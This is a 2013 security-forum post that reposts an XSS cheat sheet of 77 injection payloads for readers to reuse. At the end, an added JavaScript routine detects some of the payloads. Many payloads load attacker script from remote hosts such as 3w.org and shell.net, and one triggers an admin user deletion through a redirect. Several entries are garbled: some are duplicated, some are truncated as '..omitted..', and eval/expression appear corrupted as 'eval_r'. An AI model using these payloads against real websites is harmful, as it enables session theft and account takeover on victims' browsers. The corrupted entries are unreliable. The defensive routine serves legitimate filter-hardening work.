XSS attack roundup

Posted on 2013-4-19 19:22:37
There seems to be little XSS material on t00ls, so I'm copying over some good stuff I came across, in case anyone wants to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
T00LS - Powered by Discuz! Board, https://www.t00ls.net/viewthread ... table&tid=15267 (printed 12-7-1)
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (null characters basically have no effect domestically, because there is nowhere to use them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) JavaScript with the escape filtered
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can add JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping the [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Dropping the [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
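The defender's side of the list above, as an added example that is not part of the post or of the cheat sheet it copies: a server-side check for URL-bearing attributes (SRC, HREF, BACKGROUND) that decodes numeric entities and strips the characters browsers ignore before it looks at the scheme, which is what a plain substring match misses for vectors (4), (5), (9)-(14), (17) and (19). The scheme allow-list, the ignored-character set (taken from the whitespace code points listed in vector (47)) and the `naiveCheck` straw man are our own choices, not anything the post prescribes.

```javascript
// Added example: browser-style normalisation before a scheme allow-list check.
// Allow-list and ignored-character set are our assumptions, not the post's.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Characters browsers drop inside a URL attribute: ASCII controls (tab, LF,
// CR, NUL ...), space, DEL, and the Unicode spaces listed in vector (47).
const IGNORED_CHARS = /[\u0000-\u0020\u007f\u00a0\u2000-\u200b\u3000\ufeff]/g;

// Decode HTML numeric character references (decimal and hex). The trailing
// ';' is optional, which is exactly what vectors (9) and (10) rely on.
function decodeNumericEntities(s) {
  const toChar = (cp) => (cp <= 0x10ffff ? String.fromCodePoint(cp) : '');
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => toChar(parseInt(hex, 16)))
    .replace(/&#([0-9]+);?/g, (_, dec) => toChar(parseInt(dec, 10)));
}

// The scheme a browser would actually act on, lower-cased, or null when the
// value has no scheme (a relative or protocol-relative URL).
function effectiveScheme(value) {
  const normalised = decodeNumericEntities(value).replace(IGNORED_CHARS, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(normalised);
  return m ? m[1] : null;
}

// Naive filter: case-sensitive substring match on the raw value. Kept here
// only to show which of the post's vectors it lets through.
function naiveCheck(value) {
  return !value.includes('javascript:');
}

// Hardened filter: relative URLs and an explicit scheme allow-list only.
function isSafeUrlAttribute(value) {
  const scheme = effectiveScheme(value);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed samples modelled on the post's vectors (4), (11), (10) and (38).
const SAMPLES = [
  "JaVaScRiPt:alert('XSS')",
  "jav\tascript:alert('XSS');",
  '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61',
  'http://3w.org/xss.css',
];
for (const v of SAMPLES) {
  console.log(JSON.stringify(v), 'naive:', naiveCheck(v), 'hardened:', isSafeUrlAttribute(v));
}
```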